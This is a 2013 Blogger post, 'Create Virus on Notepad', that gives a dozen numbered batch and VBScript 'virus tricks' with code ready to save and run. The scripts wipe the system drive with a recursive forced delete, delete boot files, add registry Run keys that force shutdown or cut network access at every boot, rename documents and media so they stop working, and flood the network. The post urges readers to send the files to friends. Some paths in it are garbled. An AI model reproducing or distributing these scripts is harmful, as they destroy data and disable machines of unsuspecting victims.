Computer Antivirus

  • Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg

Monday, 19 August 2013

Create Virus on Notepad

Posted on 08:49 by Unknown

Create Virus on Notepad

1 -> Virus Creation Tricks 1

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”


Now Save This Notepad file With Any Name Having  .vbs Extension . 

2 -> Virus Creation Trick  2 .
Open Notepad and write "start" without quotes
Start
Start
Start 

and then save it with .bat extension. 
Now double click on this .bat file to run Command Prompt.

 3 -> Virus Creation Trick 3 
Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
 
Save it as "Anything.BAT" in All Files and send it. 

4 -> Virus Creation Trick 4 
Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it. 

5 -> Virus Creation Trick 5 
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:

Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.
  



6 -> Virus Creation Trick 6  
This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00


Save The Above Code As Anything.bat 




7 -> Virus Creation Trick 7
This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next


Save It As Anything.vbs 
 
 8 -> Virus Creation Trick 8
The Most Simple Virus To Crush The Window
It Only Works With Windows XP



@Echo off
Del C: *.* |y


Save It As Anything.bat 

 9 -> Virus Creation Trick 9
Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


10 -> Virus Creation Trick 10
Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


11 -> Virus Creation Trick 11
Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File
 
  
12 -> Virus Creation Trick 12 
Change Files To Non-working TXT Files
Save As A bat File


REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

  

13 -> Virus Creation Trick 13 
System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File


Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup ! 
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Posted in | No comments
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • Cool Amazing and Interesting Facts
    Hey, Hi Friends Today we will see some Cool Amazing Facts. Just go through the with below facts and Share with your Friends  *Every year, ki...
  • HOW TO MAKE COPY OF WINDOW7 GENUINE
     HOW TO MAKE YOUR COPY OF WINDOW7  GENUINE FIRST OPEN CMD AS ADMINISTRATOR TO OPENIT  TYPE CMD IN START SEARCH BOX  AND WRITE CLICKON CMD AN...
  • HOW TO ADD YOUR NAME: TO SHORTCUT MENU ON RIGHT CLICK
    HOW TO ADD NAME: IN SHORTCUT     Open notepad (Windows key + R and type notepad).     Paste in the following script: Windows Registry Editor...
  • Hack admin password from guest account
    Hack admin password from guest account !! yayy now its possible :) Ever wanted to hack your college PC with guest account/student or just wa...
  • some more run line commands
    Run Line Commands These are GUI applications that can be opened from the run line. These applications are not located in the C:\windows\syst...
  • (no title)
     HOW TO MAKE YOUR COPY OF WINDOW7  GENUINE FIRST OPEN CMD AS ADMINISTRATOR TO OPENIT  TYPE CMD IN START SEARCH BOX  AND WRITE CLICKON CMD AN...
  • TOP COMMAND PROMPT COMMAND
    1. Accessibility Controls - access.cpl 2. Accessibility Wizard - accwiz 3. Add Hardware Wizard - hdwwiz.cpl 4. Add/Remove Programs - appwiz....
  • HOW TO HIDE DRIVES USING CMD
    HOW TO HIDE DRIVES  USING CMD     Serach cmd and run it as Administrator.     Type mountvol in command prompt and press enter. It will show ...
  • Create Virus on Notepad
    Create Virus on Notepad 1 -> Virus Creation Tricks 1 Just open the Notepad and type the paste the following Code. set ws=createobject(...
  • What are the F1through F12 keys?
    What are the F1through F12 keys? Commonly known as "function keys", F1 through F12 may have a variety of different uses or no use ...

Blog Archive

  • ▼  2013 (37)
    • ▼  August (29)
      • What are the F1through F12 keys?
      • HOW TO HIDE DRIVES USING CMD
      • Hack admin password from guest account
      • how to enable this (Ctrl+V) shortcut for pasting i...
      • some more run line commands
      • some more command Codes
      • WINDOWS TRICKS AND TIPS
      • Create Virus on Notepad
      • HOW TO CHECK YOUR ANTIVIRUS IS REAL OR FAKE
      • HOW TO MAKE AN NON-DELETE ABLE FOLDER
      • How to Change the Icon of Removable Drives
      • CMD Fun Tricks and Useful CMD Commands
      • Add a background picture to your USB flash drive
      • Activate Your Expired Internet Download Manager - ...
      • SPEED UP YOUR INTERNET CONNECTION
      • MAKE YOUR COMPUTER WELCOMES YOU
      • TOP KEYBOARD SHORTCUTS
      • WINDOWS HACKING
      • MAKE YOUR COPY OF WINDOW XP GENUINE
      • HIDDEN COMMAND TRICKS
      • RUN COMMANDS
      • USE VLC AS AVIDEO CUTTER
      • HOW TO ADD SHUTDOWN MENU TO RIGHT CLICK ON DESKTOP
      • HOW TO ADD YOUR NAME: TO SHORTCUT MENU ON RIGHT CLICK
      • How To Make Bootable Usb Pen drive For Windows 7 Or 8
      • HOW TO USE YOUR PENDRIVE AS RAM
      • TOP COMMAND PROMPT COMMAND
      •  HOW TO MAKE YOUR COPY OF WINDOW7  GENUINEFIRST OP...
      • HOW TO MAKE COPY OF WINDOW7 GENUINE
    • ►  February (8)
  • ►  2012 (5)
    • ►  December (5)
Powered by Blogger.

About Me

Unknown
View my complete profile